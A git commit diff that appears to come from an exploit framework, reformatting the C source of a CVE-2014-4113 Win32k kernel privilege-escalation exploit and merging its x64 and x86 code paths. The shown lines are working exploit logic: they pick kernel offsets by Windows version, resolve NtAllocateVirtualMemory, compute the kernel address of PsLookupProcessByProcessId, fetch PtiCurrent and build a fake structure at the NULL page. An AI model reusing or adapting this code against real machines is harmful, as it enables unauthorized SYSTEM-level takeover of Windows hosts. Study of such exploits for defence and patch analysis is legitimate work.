More code tidying, reduced x64/x86 duplication

OJ · OJ · commit 0e761575c89f · 2014-10-28T08:09:18.000+10:00
diff --git a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
@@ -180,7 +180,9 @@ void Win32kNullPage(LPVOID lpPayload)
 	LogMessage("[*] Getting Windows version...");
 	memset(&VersionInformation, 0, sizeof(OSVERSIONINFOA));
 	VersionInformation.dwOSVersionInfoSize = 148;
-	if (!GetVersionExA(&VersionInformation)) {
+
+	if (!GetVersionExA(&VersionInformation))
+	{
 		LogMessage("[!] Failed to get windows version");
 		return;
 	}
@@ -207,27 +209,33 @@ void Win32kNullPage(LPVOID lpPayload)
 			LogMessage("[*] Windows 6.0 found...");
 			OffsetWindows = 0xe0;
 		}
-		else {
+		else
+		{
 			LogMessage("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", VersionInformation.dwMinorVersion);
 			return;
 		}
 	}
-	else if (VersionInformation.dwMajorVersion == 5) {
+	else if (VersionInformation.dwMajorVersion == 5)
+	{
 		if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows XP SP3
 			LogMessage("[*] Windows 5.1 found...");
 			OffsetWindows = 0xc8;
 		}
-		else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2) { // Ex: Windows 2003 SP2
+		else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2)
+		{
+			// Ex: Windows 2003 SP2
 			LogMessage("[*] Windows 5.2 found...");
 			OffsetWindows = 0xd8;
 		}
-		else {
+		else
+		{
 			LogMessage("[!] Unsupported Windows 5  found, only 5.1 and 5.2 supported atm");
 			return;
 		}
 	}
 #endif
-	else {
+	else
+	{
 		LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
 		return;
 	}
@@ -250,7 +258,8 @@ void Win32kNullPage(LPVOID lpPayload)
 	}
 
 	pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
-	if (pNtAllocateVirtualMemory == NULL) {
+	if (pNtAllocateVirtualMemory == NULL)
+	{
 		LogMessage("[!] Failed to solve NtAllocateVirtualMemory");
 		return;
 	}
@@ -328,13 +337,8 @@ void Win32kNullPage(LPVOID lpPayload)
 		return;
 	}
 
-#ifdef _M_X64
-	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl));
-	LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
-#else
-	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
-	LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
-#endif
+	pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD_PTR)nt_base + ((DWORD_PTR)pPsLookupProcessByProcessId - (DWORD_PTR)ntkrnl));
+	LogMessage("[*] pPsLookupProcessByProcessId in kernel: 0x%p\n", pPsLookupProcessByProcessId);
 
 	MyProcessId = GetCurrentProcessId();
 
@@ -385,7 +389,7 @@ void Win32kNullPage(LPVOID lpPayload)
 	LogMessage("[*] Getting PtiCurrent...");
 
 #ifdef _M_X64
-	ULONGLONG pti = MyPtiCurrent();
+	DWORD_PTR pti = MyPtiCurrent();
 #else
 	DWORD pti = MyPtiCurrent();
 #endif
@@ -402,15 +406,8 @@ void Win32kNullPage(LPVOID lpPayload)
 		LogMessage("[!] Filed to get PtiCurrent");
 		return;
 	}
-	else
-	{
-#ifdef _M_X64
-		LogMessage("[*] Good! pti 0x%016llx", pti);
-#else
-		LogMessage("[*] Good! pti 0x%08x", pti);
-#endif
-	}
 
+	LogMessage("[*] Good! pti 0x%p", pti);
 	LogMessage("[*] Creating a fake structure at NULL...");
 
 #ifdef _M_X64
